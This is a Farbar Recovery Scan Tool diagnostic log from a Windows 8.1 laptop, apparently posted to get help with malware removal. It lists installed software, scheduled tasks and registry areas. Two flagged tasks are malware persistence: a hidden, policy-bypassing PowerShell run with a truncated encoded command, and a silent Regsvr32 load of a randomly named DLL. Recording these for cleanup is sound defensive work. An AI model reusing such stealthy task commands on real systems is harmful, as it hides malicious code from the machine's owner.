Ran by xains_000 (2016-05-01 06:54:37)
Running from C:\Users\xains_000\Downloads
Windows 8.1 (X64) (2014-12-26 13:01:49)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-2829069514-779319184-155462201-500 - Administrator - Disabled)
Christina (S-1-5-21-2829069514-779319184-155462201-1001 - Administrator - Enabled) => C:\Users\Christina
Guest (S-1-5-21-2829069514-779319184-155462201-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2829069514-779319184-155462201-1003 - Limited - Enabled)
xains_000 (S-1-5-21-2829069514-779319184-155462201-1004 - Administrator - Enabled) => C:\Users\xains_000

4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.6.0.248 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-lot Mysteries (x32 Version: 3.0.2.51 - WildTangent) Hidden
Building the Great Wall of China Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Chromium (HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Chromium) (Version: 46.0.2480.0 - Chromium)
Curse at Twilight (x32 Version: 3.0.2.51 - WildTangent) Hidden
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.6.3728 - CyberLink Corp.)
CyberLink MediaEspresso 6.7 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.7.1.5112 - CyberLink Corp.)
Cyberlink PhotoDirector (HKLM-x32\...\InstallShield_{39337565-330E-4ab6-A9AE-AC81E0720B10}) (Version: 3.0.4.4824 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.6.3821 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.6.3912 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.3.3709 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.3.3907 - CyberLink Corp.)
Delicious - Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dragon Assistant 3 (HKLM-x32\...\{4693847A-7139-4CF4-B274-916C046C9E50}) (Version: 3.0.232 - Nuance Communications Inc.)
Dragon Assistant 3 Language Data Pack en_US (HKLM-x32\...\{532A5345-1A42-4C55-B56E-CE753D0BAA02}) (Version: 3.0.232 - Nuance Communications Inc.)
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Evernote v. 5.2 (HKLM-x32\...\{412F6426-A3C7-11E3-8A71-00163E98E7D6}) (Version: 5.2.0.2951 - Evernote Corp.)
Extended Update (HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\UpdaterEX) (Version: - Extended Update) <==== ATTENTION
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
FarmVille 2 (HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Pokki_34e8f5c0c9e5744bf2cdb514283762dd0524776b) (Version: 1.0.3.48508 - Pokki)
Fishdom 3: Collector's Edition (x32 Version: 3.0.2.38 - WildTangent) Hidden
Fort Defense (x32 Version: 3.0.2.51 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 50.0.2661.94 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.110 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP 3D DriveGuard (HKLM-x32\...\{F90A86C9-7779-47DD-AC06-8EE832C55F55}) (Version: 6.0.18.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{E2C8D0C2-1C97-4C05-939A-5B13A0FE655C}) (Version: 2.20.31 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{ADD75863-9A69-4C44-9B43-11AE2B12BE51}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7493.4758 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.2.8.25 - HP)
HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.2.8.17 - HP)
HP System Event Utility (HKLM-x32\...\{DEF23826-DB71-4654-BC00-D5D6C20802EA}) (Version: 1.1.4 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{36F80C5F-DC0D-4DF4-AF09-DC1867F0EB0A}) (Version: 2.4.4 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.0.157.1 - Intel Security)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel(R) PRO/Wireless Driver (HKLM\...\{dd372384-a281-47d6-8ef4-19cc622dce4e}) (Version: 17.00.1000.1423 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3496 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{51AC86D3-C431-48AD-9195-0D6C930D07CD}) (Version: 4.2.41.2710 - Intel Corporation)
Intel(R) Virtual Buttons (HKLM-x32\...\1992736F-C90A-481C-B21B-EE34CAD07387) (Version: 1.0.0.14 - Intel Corporation)
Intel(R) Wireless Bluetooth(R) 4.0 (HKLM-x32\...\{A405194D-16D1-44FA-8FF8-D43684D77005}) (Version: 17.0.1407.02 - Intel Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Joining Hands 2 (x32 Version: 3.0.2.51 - WildTangent) Hidden
King Oddball (x32 Version: 3.0.2.48 - WildTangent) Hidden
Lost in Reefs 2 (x32 Version: 3.0.2.51 - WildTangent) Hidden
LUXOR Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
McAfee AntiVirus (HKLM-x32\...\MSC) (Version: 14.0.8185 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.189 - McAfee, Inc.)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4815.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\OneDriveSetup.exe) (Version: 17.3.6302.0225 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 45.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 45.0.2 (x86 en-US)) (Version: 45.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.2 - Mozilla)
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Pinger (HKLM-x32\...\Pinger 1.4.0.1) (Version: 1.4.0.1 - Pinger Inc.)
Pinger (x32 Version: 1.4.0.1 - Pinger Inc.) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 3.0.2.51 - WildTangent) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.40 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7219 - Realtek Semiconductor Corp.)
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Solitaire Mystery Four Seasons (x32 Version: 3.0.2.51 - WildTangent) Hidden
Sparkle 2 (x32 Version: 3.0.2.51 - WildTangent) Hidden
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.21.18.4608 - Enigma Software Group, LLC)
Start Menu (HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Pokki) (Version: 0.269.2.450 - Pokki)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.7.6 - Synaptics Incorporated)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Vacation Quest™ - Australia (x32 Version: 3.0.2.32 - WildTangent) Hidden
Viking Saga (x32 Version: 3.0.2.48 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App for HP (x32 Version: 4.0.11.2 - WildTangent) Hidden
Youda Jewel Shop (x32 Version: 3.0.2.51 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
CustomCLSID: HKU\S-1-5-21-2829069514-779319184-155462201-1004_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-2829069514-779319184-155462201-1004_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {067F7347-73D8-4E78-8A80-D42A47E4EE4C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-05-01] (Google Inc.)
Task: {0D148221-0465-4AE1-80E5-A48FA883D04A} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2013-11-01] (Hewlett-Packard Development Company, L.P.)
Task: {12FA32E3-6AAD-4D7C-B0A5-DACA9FD76CAF} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-03-07] (CyberLink Corp.)
Task: {23AB0F30-1013-4130-A562-8DD324C67288} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {3BCB0E27-349B-4CB0-B83B-F99E97443699} - System32\Tasks\{7F7A0B47-057D-790F-0B11-7E0B0B0A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9452 more characters). <==== ATTENTION
Task: {53D033C6-BEBE-40D3-86F5-EB645D81502F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-02-17] (Hewlett-Packard)
Task: {561CFF7B-2820-46A9-9F6B-3827F534E38F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-02-17] (HP Inc.)
Task: {57564428-2D7F-421F-9976-C01E8A2A49DF} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe [2016-05-01] (Enigma Software Group USA, LLC.)
Task: {59036300-B2D5-460E-B34B-A33CF625B8EB} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2829069514-779319184-155462201-1001 => C:\Users\xains_000\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Task: {60AEAF26-A9AC-427A-9BEE-A4EE2758A328} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-05-01] (Google Inc.)
Task: {66505EDF-1546-45A6-8B40-3EEC1DC7335C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-02-18] (Hewlett-Packard Company)
Task: {6C8CC56B-0069-4E46-9B3D-C80AE0B27564} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {6E71D0ED-FBA8-4320-8141-B1BE0F0E994A} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {7D55E395-9115-4904-9A4B-944ADB5AAD14} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-01] (McAfee, Inc.)
Task: {82CDFED9-3360-4666-B8E8-CF7480B33530} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-02-17] (HP Inc.)
Task: {82EECDA3-D848-4507-88F5-BAC4056077E3} - System32\Tasks\{3812E89A-9CD5-827D-95E1-138FFC80BA45} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\519cee09\67178cbb.dll" <==== ATTENTION
Task: {8351835F-BED2-4DCF-9C1D-8F354D6E219A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {97F84324-66FC-4F40-9EE6-90AF97A91BEF} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\mcafee\Platform\McUICnt.exe [2016-03-10] (McAfee, Inc.)
Task: {A676A708-EE61-4519-A5A9-D7D8DEB531E8} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-02-18] (Hewlett-Packard Company)
Task: {AA024A13-0C02-4852-9C92-6DC5233BA230} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2016-03-07] (Microsoft Corporation)
Task: {AC62FF6A-C326-485E-8B54-F84C34C1307D} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {BDB0FD0E-F754-4D7E-A985-1486EC07D415} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-2829069514-779319184-155462201-1001Core => C:\Users\Christina\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-09-29] (Dropbox, Inc.)
Task: {D3848913-3200-4957-850E-D9B6638C2350} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {F4C07B4A-523B-4A2B-BBE6-3E3560DFA37B} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-2829069514-779319184-155462201-1001UA => C:\Users\Christina\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-09-29] (Dropbox, Inc.)
Task: {F7DE8832-20DF-4FE4-BE30-AD5C0F1BEAB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-04-26] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-2829069514-779319184-155462201-1001Core.job => C:\Users\Christina\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-2829069514-779319184-155462201-1001UA.job => C:\Users\Christina\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-03-28 16:31 - 2014-03-28 16:31 - 02110464 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll
2014-03-28 16:27 - 2014-03-28 16:27 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll
2014-03-28 16:27 - 2014-03-28 16:27 - 00035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll
2014-03-28 16:27 - 2014-03-28 16:27 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll
2014-03-28 16:48 - 2014-03-28 16:48 - 00367504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll
2014-03-28 16:48 - 2014-03-28 16:48 - 00712080 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll
2015-01-03 09:24 - 2015-10-13 06:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2013-12-04 11:44 - 2013-12-04 11:44 - 00200168 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
2013-12-04 11:44 - 2013-12-04 11:44 - 00054760 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\NetworkHeuristic.dll
2013-12-04 11:44 - 2013-12-04 11:44 - 00034792 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTNetMon.dll
2016-04-01 23:18 - 2016-04-01 23:18 - 00426160 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2015-09-29 21:16 - 2015-10-21 23:47 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2014-03-28 16:36 - 2014-03-28 16:36 - 00065024 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
2014-07-20 20:47 - 2013-12-10 11:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 09:25 - 2016-05-01 02:11 - 00000826 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
HKU\S-1-5-21-2829069514-779319184-155462201-1004\Control Panel\Desktop\\Wallpaper -> C:\Users\xains_000\Downloads\fallout_photo_manipulation-wallpaper-1920x1080.jpg
HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\xains_000\Downloads\fallout_photo_manipulation-wallpaper-1920x1080.jpg
DNS Servers: 192.168.0.1
 
#16 ·
Second Additional:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{59AA2972-807D-451B-9C1A-5C531055D698}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{C3B3E42E-20B4-4310-8CA1-F612C44DB4D8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6CAA5E5B-3B37-4B1C-AAF4-55FD2B25CD84}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
